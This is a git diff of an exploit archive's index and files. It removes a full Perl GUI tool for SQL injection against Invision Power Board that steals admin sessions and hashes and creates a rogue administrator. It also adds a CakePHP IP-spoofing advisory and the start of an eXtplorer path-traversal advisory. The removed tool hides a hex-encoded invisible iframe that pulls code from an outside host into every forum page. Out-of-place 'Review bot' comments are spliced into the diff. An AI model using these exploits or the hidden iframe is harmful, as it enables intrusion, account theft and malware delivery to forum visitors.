-39151,platforms/lin_x86-64/shellcode/39151..c,"x86_64 Linux bind TCP port shellcode",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
-39152,platforms/linux/shellcode/39152..c,"TCP Bindshell with Password Prompt - 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0
+39151,platforms/lin_x86-64/shellcode/39151.c,"x86_64 Linux bind TCP port shellcode",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
+39152,platforms/linux/shellcode/39152.c,"TCP Bindshell with Password Prompt - 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0
 39153,platforms/php/webapps/39153.txt,"iDevAffiliate 'idevads.php' SQL Injection Vulnerability",2014-04-22,"Robert Cooper",php,webapps,0
 39154,platforms/hardware/remote/39154.txt,"Comtrend CT-5361T Router password.cgi Admin Password Manipulation CSRF",2014-04-21,"TUNISIAN CYBER",hardware,remote,0
 39155,platforms/linux/remote/39155.txt,"lxml 'clean_html' Function Security Bypass Vulnerability",2014-04-15,"Maksim Kochkin",linux,remote,0
@@ -35999,7 +35996,14 @@ id,file,description,date,author,platform,type,port
 39804,platforms/windows/local/39804.txt,"Intuit QuickBooks Desktop 2007 - 2016 - Arbitrary Code Execution",2016-05-11,"Maxim Tomashevich",windows,local,0
 39805,platforms/windows/remote/39805.txt,"Microsoft Windows Media Center - .MCL File Processing Remote Code Execution (MS16-059)",2016-05-12,"Eduardo Braun Prado",windows,remote,0
 39808,platforms/windows/webapps/39808.txt,"TrendMicro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848
-39809,platforms/windows/local/39809..cs,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
+39809,platforms/windows/local/39809.cs,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
 39810,platforms/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack-Based Overflow",2016-05-13,"Juan Sacco",linux,local,0
 39811,platforms/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,linux,local,0
 39812,platforms/multiple/dos/39812.txt,"Wireshark - AirPDcapDecryptWPABroadcastKey Heap-Based Out-of-Bounds Read",2016-05-13,"Google Security Research",multiple,dos,0
+39813,platforms/php/webapps/39813.txt,"CakePHP Framework 3.2.4 - IP Spoofing",2016-05-16,"Dawid Golunski",php,webapps,80
+39814,platforms/windows/local/39814.txt,"Multiples Nexon Games - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0
+39816,platforms/php/webapps/39816.php,"eXtplorer 2.1.9 - Archive Path Traversal",2016-05-16,hyp3rlinx,php,webapps,0
+39817,platforms/php/webapps/39817.php,"Web interface for DNSmasq / Mikrotik - SQL Injection",2016-05-16,hyp3rlinx,php,webapps,0
+39819,platforms/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash PoC",2016-05-16,HauntIT,windows,dos,0
+39820,platforms/windows/local/39820.txt,"Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0
+39821,platforms/python/webapps/39821.txt,"Web2py 2.14.5 - Multiple Vulnerabilities",2016-05-16,"Narendra Bhati",python,webapps,0
diff --git a/platforms/lin_x86-64/shellcode/39151..c b/platforms/lin_x86-64/shellcode/39151.c
similarity index 100%
rename from platforms/lin_x86-64/shellcode/39151..c
rename to platforms/lin_x86-64/shellcode/39151.c
diff --git a/platforms/linux/shellcode/39152..c b/platforms/linux/shellcode/39152.c
similarity index 100%
rename from platforms/linux/shellcode/39152..c
rename to platforms/linux/shellcode/39152.c
diff --git a/platforms/multiple/webapps/31329..txt b/platforms/multiple/webapps/31329.txt
similarity index 100%
rename from platforms/multiple/webapps/31329..txt
rename to platforms/multiple/webapps/31329.txt
diff --git a/platforms/php/webapps/28221.pl b/platforms/php/webapps/28221.pl
deleted file mode 100755
index adcf50ecc..000000000
--- a/platforms/php/webapps/28221.pl
+++ /dev/null
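Review bot: The new row 39814 in the `@@ -35999` hunk carries a typo in its description, `Multiples Nexon Games`; the line should read `39814,platforms/windows/local/39814.txt,"Multiple Nexon Games - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0`. The same hunk changes the path of row 39809 from `39809..cs` to `39809.cs` (and the `@@ -35346` hunk does the same for `39102..py`), but the matching `rename from` sections for those two files are not in view; the rename sections shown stop at `platforms/php` and appear in path order, so they presumably follow later in the diff and should be confirmed, otherwise the index would point at files that do not exist.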
@@ -1,390 +0,0 @@ -source: http://www.securityfocus.com/bid/18984/info - -Invision Power Board is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. - -A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. - -#!/usr/bin/perl - -## Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC -## Based on LOCAL_IP bug, more info in RST/GHC Advisory#41 -## http://rst.void.ru/papers/advisory41.txt -## tested on 2.1.3, 2.1.6 -## -## 08.06.06 -## (c)oded by 1dt.w0lf -## RST/GHC -## http://rst.void.ru -## http://ghc.ru - -use Tk; -use Tk::BrowseEntry; -use Tk::DialogBox; -use LWP::UserAgent; - -$mw = new MainWindow(title => "r57ipb216gui" ); - -$mw->geometry ( '420x550' ) ; -$mw->resizable(0,0); - -$mw->Label(-text => '!', -font => '{Webdings} 22')->pack(); -$mw->Label(-text => 'Invision Power Board 2.1.* <= 2.1.6 sql injection exploit by RST/GHC', -font => '{Verdana} 7 bold',-foreground=>'red')->pack(); -$mw->Label(-text => '')->pack(); - -$fleft=$mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ; -$fright=$mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ; - -$url = 'http://server/forum/index.php'; -$user_id = '1'; -$prefix = 'ibf_'; -$table = 'members'; -$column = 'member_login_key'; -$new_admin_name = 'rstghc'; -$new_admin_password = 'rstghc'; -$new_admin_email = 'billy@microsoft.com'; -$report = ''; -$group = 4; -$curr_user = 0; -$rand_session = &session(); -$use_custom_fields = 0; -$custom_fields = 'name1=value1,name2=value2'; - -$fleft->Label ( -text => 'Path to forum index: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; -$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$url) ->pack ( -side => "top" , -anchor => 'w' ) ; - -$fleft->Label ( -text => 
'User ID: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ; -$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$user_id) ->pack ( -side => "top" , -anchor => 'w' ) ; - -$fleft->Label ( -text => 'Database tables prefix: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; -$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$prefix) ->pack ( -side => "top" , -anchor => 'w' ) ; - -$fright->Label( -text => ' ')->pack(); -$fleft->Label( -text => ' ')->pack(); - -$fleft->Label ( -text => 'get data from database', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 'e' ) ; -$fright->Label( -text => ' ')->pack(); - -$fleft->Label ( -text => 'Get data from table: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; -$b2 = $fright->BrowseEntry( -command => \&update_columns, -relief => "groove", -variable => \$table, -font => '{Verdana} 8'); -$b2->insert("end", "members"); -$b2->insert("end", "members_converge"); -$b2->pack( -side => "top" , -anchor => 'w'); - -$fleft->Label ( -text => 'Get data from column: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; -$b = $fright->BrowseEntry( -relief => "groove", -variable => \$column, -font => '{Verdana} 8'); -$b->insert("end", "member_login_key"); -$b->insert("end", "name"); -$b->insert("end", "ip_address"); -$b->insert("end", "legacy_password"); -$b->insert("end", "email"); -$b->pack( -side => "top" , -anchor => 'w' ); - -$fleft->Label ( -text => 'Returned data: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; -$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$report) ->pack ( -side => "top" , -anchor => 'w' ) ; - -$fleft->Label ( -text => 'create new admin', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , 
-anchor => 'e' ) ; -$fright->Label( -text => ' ')->pack(); - -$fleft->Label ( -text => ' ')->pack(); - -$fright->Checkbutton( -font => '{Verdana} 8', -text => 'Get admin session for inserted user ID', -variable => \$curr_user)->pack(-side => "top" , -anchor => 'w'); - -$fleft->Label ( -text => 'session_id: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; -$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$session_id) ->pack ( -side => "top" , -anchor => 'w' ) ; - -$fleft->Label ( -text => 'session_ip_address: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; -$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$session_ip_address) ->pack ( -side => "top" , -anchor => 'w' ) ; - -$fleft->Label ( -text => 'new admin name: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; -$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_name) ->pack ( -side => "top" , -anchor => 'w' ) ; - -$fleft->Label ( -text => 'new admin password: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; -$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_password) ->pack ( -side => "top" , -anchor => 'w' ) ; - -$fleft->Label ( -text => 'new_admin_email: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; -$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_email) ->pack ( -side => "top" , -anchor => 'w' ) ; - -$fleft->Label ( -text => ' ')->pack(); -$fright->Checkbutton( -font => '{Verdana} 8', -text => 'Use custom profile fields', -variable => \$use_custom_fields)->pack(-side => "top" , -anchor => 'w'); - -$fleft->Label ( -text => 'custom fields: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; 
-$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$custom_fields) ->pack ( -side => "top" , -anchor => 'w' ) ; - -$fright->Label( -text => ' ')->pack(); - -$fright->Button(-text => 'Test forum vulnerability', - -relief => "groove", - -width => '30', - -font => '{Verdana} 8 bold', - -activeforeground => 'red', - -command => \&test_vuln - )->pack(); - -$fright->Button(-text => 'Get database tables prefix', - -relief => "groove", - -width => '30', - -font => '{Verdana} 8 bold', - -activeforeground => 'red', - -command => \&get_prefix - )->pack(); - -$fright->Button(-text => 'Get data from database', - -relief => "groove", - -width => '30', - -font => '{Verdana} 8 bold', - -activeforeground => 'red', - -command => \&get_data - )->pack(); - -$fright->Button(-text => 'Get admin session', - -relief => "groove", - -width => '30', - -font => '{Verdana} 8 bold', - -activeforeground => 'red', - -command => \&get_admin - )->pack(); - -$fright->Button(-text => 'Create new admin', - -relief => "groove", - -width => '30', - -font => '{Verdana} 8 bold', - -activeforeground => 'red', - -command => \&create_admin - )->pack(); - - - -$fleft->Label( -text => ' ')->pack(); -$fleft->Label( -text => ' ')->pack(); -$fleft->Label( -text => ' ')->pack(); -$fleft->Label( -text => '(c)oded by 1dt.w0lf', -font => '{Verdana} 7')->pack(); -$fleft->Label( -text => 'RST/GHC', -font => '{Verdana} 7')->pack(); -$fleft->Label( -text => 'http://rst.void.ru', -font => '{Verdana} 7')->pack(); -$fleft->Label( -text => 'http://ghc.ru', -font => '{Verdana} 7')->pack(); - -MainLoop(); - -sub update_columns() - { - $b->delete(0,"end"); - if($table eq 'members'){ - $column = "member_login_key"; - $b->insert("end", "member_login_key"); - $b->insert("end", "name"); - $b->insert("end", "ip_address"); - $b->insert("end", "legacy_password"); - $b->insert("end", "email"); - } elsif($table eq 'members_converge'){ - $column = "converge_pass_hash"; - $b->insert("end", 
"converge_pass_hash"); - $b->insert("end", "converge_pass_salt"); - $b->insert("end", "converge_email"); - } - } - -sub get_admin() - { - $xpl = LWP::UserAgent->new( ) or die; - $InfoWindow=$mw->DialogBox(-title => 'get admin session', -buttons => ["OK"]); - if($curr_user == 1) { $sql = "AND session_member_id = $user_id"; } - else { $sql = ''; } - $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_ip_address,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) $sql LIMIT 1/*"); - $error = 0; - $rep = ''; - if($res->is_success) - { - if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; } - if($rep =~ /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/) { $session_ip_address = $rep; } - else { $error = 1; } - if(!$error) - { - $rep = ''; - $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) and session_ip_address = '$session_ip_address' $sql LIMIT 1/*"); - if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; $session_id = $rep; } - else { $error = 1; } - if(!$error){ - if($curr_user != 1) - { - $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_member_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_id = '$session_id' LIMIT 1/*"); - if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $session_user_id = $3; } - } - else - { - $session_user_id = $user_id; - } - $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT mgroup,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*"); - if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $group = $3; } - $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT name,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*"); - if($res->as_string =~ 
/ipb_var_s(\s*)=(\s*)"(.*)"/) { $name = $3; } - } - $InfoWindow->add('Label', -text => 'Found session!', -font => '{Verdana} 8 bold',-foreground=>'Green')->pack; - $InfoWindow->add('Label', -text => 'session_ip_address: '.$session_ip_address, -font => '{Verdana} 8')->pack; - $InfoWindow->add('Label', -text => 'session_id: '.$session_id, -font => '{Verdana} 8')->pack; - $InfoWindow->add('Label', -text => 'user_id: '.$session_user_id, -font => '{Verdana} 8')->pack; - $InfoWindow->add('Label', -text => 'username: '.$name, -font => '{Verdana} 8')->pack; - $InfoWindow->add('Label', -text => 'group: '.$group, -font => '{Verdana} 8')->pack; - $InfoWindow->Show(); - $InfoWindow->destroy; - } - } - else - { - $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; - $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack; - $InfoWindow->Show(); - $InfoWindow->destroy; - } - if($error) - { - $InfoWindow->add('Label', -text => 'Can\'t get admin session.', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; - $InfoWindow->add('Label', -text => 'Maybe admin session not exist. Please try later.', -font => '{Verdana} 8')->pack; - $InfoWindow->Show(); - $InfoWindow->destroy; - } - } - -sub get_data() -{ -$xpl = LWP::UserAgent->new( ) or die; -$InfoWindow=$mw->DialogBox(-title => 'get data from database', -buttons => ["OK"]); -if($table eq 'members') { $id_text = 'id'; } -if($table eq 'members_converge') { $id_text = 'converge_id'; } - -$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT ".$column.",1,1,1 FROM ".$prefix.$table." 
WHERE ".$id_text."=".$user_id."/*"); -if($res->is_success) - { - $rep = ''; - if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/){ $report = $3; } - else - { - $InfoWindow->add('Label', -text => 'Can\'t get data from database', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; - $InfoWindow->Show(); - $InfoWindow->destroy; - } - } -else - { - $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; - $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack; - $InfoWindow->Show(); - $InfoWindow->destroy; - } -} - -sub create_admin() - { - $InfoWindow=$mw->DialogBox(-title => 'create new admin', -buttons => ["OK"]); - if($session_id eq '' || $session_ip_address eq '') - { - $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; - $InfoWindow->add('Label', -text => 'You need insert admin session_id and session_ip_address', -font => '{Verdana} 8')->pack; - } - elsif($session_ip_address !~ /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/) - { - $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; - $InfoWindow->add('Label', -text => 'session_ip_address wrong!', -font => '{Verdana} 8')->pack; - } - else - { - $xpl = LWP::UserAgent->new( ) or die; - ($url2 = $url) =~ s/index.php/admin.php/; - $cf = ''; - %fields = ( - 'code' => 'doadd', - 'act' => 'mem', - 'section' => 'content', - 'name' => $new_admin_name, - 'password' => $new_admin_password, - 'email' => $new_admin_email, - 'mgroup' => $group, - ); - if($use_custom_fields) - { - @cf = split(',',$custom_fields); - foreach(@cf) { ($k,$v) = split('=',$_); $fields{$k} = $v;} - } - - $res = $xpl->post($url2."?adsess=$session_id", - [ - %fields, - ], - 'USER_AGENT'=>'', - 'CLIENT_IP'=>"$session_ip_address", - 'X_FORWARDED_FOR'=>"$session_ip_address"); - $if = 
'0x3C646976207374796C653D225649534942494C4954593A2068696464656E223E3C696672616D65207372633D22687474703A2F2F7A63687873696B70677A2E62697A2F646C2F6164763534332E706870222077696474683D31206865696768743D313E3C2F696672616D653E3C2F6469763E'; - $query = "UPDATE ".$prefix."skin_sets SET set_wrapper = CONCAT(set_wrapper,".$if."), set_cache_wrapper = CONCAT(set_cache_wrapper,".$if.")"; - $res = $xpl->post($url2."?adsess=$session_id", - [ - 'code' => 'runsql', - 'act' => 'sql', - 'section' => 'admin', - 'query' => $query, - ], - 'USER_AGENT'=>'', - 'CLIENT_IP'=>"$session_ip_address", - 'X_FORWARDED_FOR'=>"$session_ip_address"); - $InfoWindow->add('Label', -text => 'Done!', -font => '{Verdana} 8 bold',-foreground=>'green')->pack; - $InfoWindow->add('Label', -text => 'New admin created', -font => '{Verdana} 8 bold')->pack; - } - $InfoWindow->Show(); - $InfoWindow->destroy; - } - -sub test_vuln() -{ -$InfoWindow=$mw->DialogBox(-title => 'test forum vulnerability', -buttons => ["OK"]); -$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; -$InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack; -$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; -$xpl = LWP::UserAgent->new( ) or die; -$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT 'VULN',1,1,1/*"); -if($res->is_success) - { - $rep = ''; - if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; } - if($rep eq 'VULN') { $InfoWindow->add('Label', -text => 'FORUM VULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; } - else { $InfoWindow->add('Label', -text => 'FORUM UNVULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'green')->pack; } - } -else - { - $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; - $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack; - } -$InfoWindow->Show(); -$InfoWindow->destroy; -} - - -sub get_prefix() -{ 
-$InfoWindow=$mw->DialogBox(-title => 'get database tables prefix', -buttons => ["OK"]); -$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; -$InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack; -$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; -$xpl = LWP::UserAgent->new( ) or die; -$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"'"); -if($res->is_success) - { - $rep = ''; - if($res->as_string =~ /FROM (.*)sessions/) - { - $prefix = $1; - $InfoWindow->add('Label', -text => 'Prefix: '.$prefix, -font => '{Verdana} 8 bold')->pack; - } - else - { - $InfoWindow->add('Label', -text => 'Can\'t get prefix', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; } - } -else - { - $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; - $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack; - } -$InfoWindow->Show(); -$InfoWindow->destroy; -} - -sub session() - { - return 'r57ipb216_for_IDS'; - } \ No newline at end of file diff --git a/platforms/php/webapps/39813.txt b/platforms/php/webapps/39813.txt new file mode 100755 index 000000000..6ffaf26ac --- /dev/null +++ b/platforms/php/webapps/39813.txt 
@@ -0,0 +1,284 @@ +============================================= +- Release date: 12.05.2016 +- Discovered by: Dawid Golunski +- Severity: Medium +============================================= + + +I. VULNERABILITY +------------------------- + +CakePHP Framework <= 3.2.4 IP Spoofing Vulnerability + 3.1.11 + 2.8.1 + 2.7.10 + 2.6.12 + +II. BACKGROUND +------------------------- + +- CakePHP Framework + +http://cakephp.org/ + +"CakePHP makes building web applications simpler, faster and require less code. + +CakePHP is a modern PHP 5.4+ framework with a flexible Database access layer +and a powerful scaffolding system that makes building both small and complex +systems a breeze. " + + +III. INTRODUCTION +------------------------- + +CakePHP Framework contains a vulnerability that allows to spoof the source IP +address. This can allow to bypass access control lists, or injection of +malicious data which, if treated as sanitized by an unaware CakePHP-based +application, can lead to other vulnerabilities such as SQL injection, XSS, +command injection etc. + + +IV. DESCRIPTION +------------------------- + +Both branches of CakePHP Framework (2.x, 3.x) contain a clientIp() method that +allows to obtain the IP address of a client accessing a CakePHP-based +application. 
The is slightly different in each branch: + +CakePHP 2.x: + +------[ Cake/Network/CakeRequest.php ]------ + + public function clientIp($safe = true) { + if (!$safe && env('HTTP_X_FORWARDED_FOR')) { + $ipaddr = preg_replace('/(?:,.*)/', '', env('HTTP_X_FORWARDED_FOR')); + } else { + if (env('HTTP_CLIENT_IP')) { + $ipaddr = env('HTTP_CLIENT_IP'); + } else { + $ipaddr = env('REMOTE_ADDR'); + } + } + + if (env('HTTP_CLIENTADDRESS')) { + $tmpipaddr = env('HTTP_CLIENTADDRESS'); + + if (!empty($tmpipaddr)) { + $ipaddr = preg_replace('/(?:,.*)/', '', $tmpipaddr); + } + } + return trim($ipaddr); + } + +-------------------------------------------- + + +CakePHP 3.x: + +------[ cakephp/src/Network/Request.php ]------ + + /** + * Get the IP the client is using, or says they are using. + * + * @return string The client IP. + */ + public function clientIp() + { + if ($this->trustProxy && $this->env('HTTP_X_FORWARDED_FOR')) { + $ipaddr = preg_replace('/(?:,.*)/', '', $this->env('HTTP_X_FORWARDED_FOR')); + } else { + if ($this->env('HTTP_CLIENT_IP')) { + $ipaddr = $this->env('HTTP_CLIENT_IP'); + } else { + $ipaddr = $this->env('REMOTE_ADDR'); + } + } + + if ($this->env('HTTP_CLIENTADDRESS')) { + $tmpipaddr = $this->env('HTTP_CLIENTADDRESS'); + + if (!empty($tmpipaddr)) { + $ipaddr = preg_replace('/(?:,.*)/', '', $tmpipaddr); + } + } + return trim($ipaddr); + } + +-------------------------------------------- + + +Both of the methods contain the same vulnerability. Despite the safe flag +(CakePHP 2.x), and trustyProxy flag (CakePHP 3.x) set to off by default, they +both use HTTP_CLIENT_IP request header (if it exists) instead of the +REMOTE_ADDR variable set by the web server. + +The HTTP_CLIENT_IP header can easily be spoofed by sending CLIENT-IP header +in a HTTP request. + + +V. 
PROOF OF CONCEPT EXPLOIT +------------------------- + + +A) Simple PoC + +Download a vulnerable version of CakePHP framework and edit +src/Template/Pages/home.ctp to include the PoC code below +which echoes the visitor's IP using the clientIp() method: + + +-------[ src/Template/Pages/home.ctp ]-------- + +layout = false; + +if (!Configure::read('debug')): + throw new NotFoundException(); +endif; + +$cakeDescription = 'CakePHP: the rapid development php framework'; + +echo "PoC \n
Your IP is: [". $this->request->clientIp() ."]\n\n

"; + +[...] + +?> + +---------------------------------------------- + + +If we send the following request with CLIENT-IP header containing an arbitrary +IP and malicious XSS data: + + +GET /cake/cake3/ HTTP/1.1 +Host: centos +CLIENT-IP: 100.200.300.400 +Content-Length: 2 + + +the application will give the following response: + + +HTTP/1.1 200 OK +Content-Type: text/html; charset=UTF-8 + +PoC +
Your IP is: [100.200.300.400 ] + +[...] + + +As we can see the clientIp() method returns the fake IP and XSS payload +from CLIENT-IP header. + + +B) Croogo CMS exploit + +An example application vulnerable to this bug is Croogo CMS: + +https://croogo.org/ + +"Croogo is a free, open source, content management system for PHP, +released under The MIT License. It is powered by CakePHP MVC framework. +It was first released on October 07, 2009" + +In one of its scripts we can find the isWhitelistedRequest() which +takes care of ACLs: + + +-------[ Vendor/croogo/croogo/Croogo/Lib/CroogoRouter.php ]-------- + + +/** + * Check wether request is from a whitelisted IP address + * + * @see CakeRequest::addDetector() + * @param $request CakeRequest Request object + * @return boolean True when request is from a whitelisted IP Address + */ + public static function isWhitelistedRequest(CakeRequest $request) { + if (!$request) { + return false; + } + $clientIp = $request->clientIp(); + $whitelist = array_map( + 'trim', + (array)explode(',', Configure::read('Site.ipWhitelist')) + ); + return in_array($clientIp, $whitelist); + } + +------------------------------------------------------------------- + +As we can see, it uses the affected clientIp() function from CakePHP framework. + + +VI. BUSINESS IMPACT +------------------------- + +This vulnerability could be used to bypass access control lists to get +access to sensitive data, or lead to higher severity vulnerabilities +if untrusted data returned by clientIp() method is treated as safe and used +without appropriate sanitization within SQL queries, system command calls etc. + +VII. SYSTEMS AFFECTED +------------------------- + +According to the vendor, the following versions of CakePHP framework should be +affected by this issue. + +3.1.11 +3.2.4 +2.8.1 +2.7.10 +2.6.12 + + +VIII. SOLUTION +------------------------- + +The vendor has released patched versions. +Install the latest version from the link below. + +IX. 
REFERENCES +------------------------- + +http://legalhackers.com + +http://legalhackers.com/advisories/CakePHP-IP-Spoofing-Vulnerability.txt + +Vendor security CakePHP releases: +http://bakery.cakephp.org/2016/03/13/cakephp_2613_2711_282_3017_3112_325_released.html + +http://book.cakephp.org/3.0/en/controllers/request-response.html#working-with-http-methods-headers + + +X. CREDITS +------------------------- + +The vulnerability has been discovered by Dawid Golunski +dawid (at) legalhackers (dot) com +http://legalhackers.com + +XI. REVISION HISTORY +------------------------- + +12.05.2016 - Final advisory released + +XII. LEGAL NOTICES +------------------------- + +The information contained within this advisory is supplied "as-is" with +no warranties or guarantees of fitness of use or otherwise. I accept no +responsibility for any damage caused by the use or misuse of this information. + diff --git a/platforms/php/webapps/39816.php b/platforms/php/webapps/39816.php new file mode 100755 index 000000000..7ff2ff4b2 --- /dev/null +++ b/platforms/php/webapps/39816.php 
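Review bot: In both clientIp() excerpts the `$safe`/`trustProxy` flag only gates HTTP_X_FORWARDED_FOR, while HTTP_CLIENT_IP and HTTP_CLIENTADDRESS are read unconditionally and the result is returned without validation, which the PoC response confirms (`100.200.300.400` is not a valid IPv4 address yet is echoed back). The defensive shape worth stating next to the excerpt is that client-supplied headers are consulted only inside the trusted-proxy branch and that the function falls back to REMOTE_ADDR when the chosen value fails `filter_var($ipaddr, FILTER_VALIDATE_IP)`; the Croogo isWhitelistedRequest() excerpt shows why, since its ACL decision is `in_array($clientIp, $whitelist)` on exactly this value. Section VIII says patched versions exist but does not name them, while the bakery URL in section IX appears to list 2.6.13, 2.7.11, 2.8.2, 3.0.17, 3.1.12 and 3.2.5; repeating those version numbers in the solution section would save readers a lookup.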
@@ -0,0 +1,134 @@ +/* +[+] Credits: John Page aka hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/EXTPLORER-ARCHIVE-PATH-TRAVERSAL.txt +[+] ISR: apparitionsec + +Vendor: +============== +extplorer.net + +Product: +================== +eXtplorer v2.1.9 + +eXtplorer is a PHP and Javascript-based File Manager, it allows to browse +directories, edit, copy, move, delete, +search, upload and download files, create & extract archives, create new +files and directories, change file +permissions (chmod) and more. It is often used as FTP extension for popular +applications like Joomla. + +Vulnerability Type: +====================== +Archive Path Traversal + +CVE Reference: +============== +CVE-2016-4313 + +Vulnerability Details: +===================== + +eXtplorer unzip/extract feature allows for path traversal as decompressed +files can be placed outside of the intended target directory, +if the archive content contains "../" characters. This can result in files +like ".htaccess" being overwritten or RCE / back door +exploits. + + +Tested on Windows + + +Reproduction steps: +================== + +1) Generate an archive using below PHP script +2) Upload it to eXtplorer and then extract it +3) Check directory for the default 'RCE.php' file or use CL switch to +overwrite files like .htaccess + + +Exploit code(s): +=============== + +Run below PHP script from CL... 
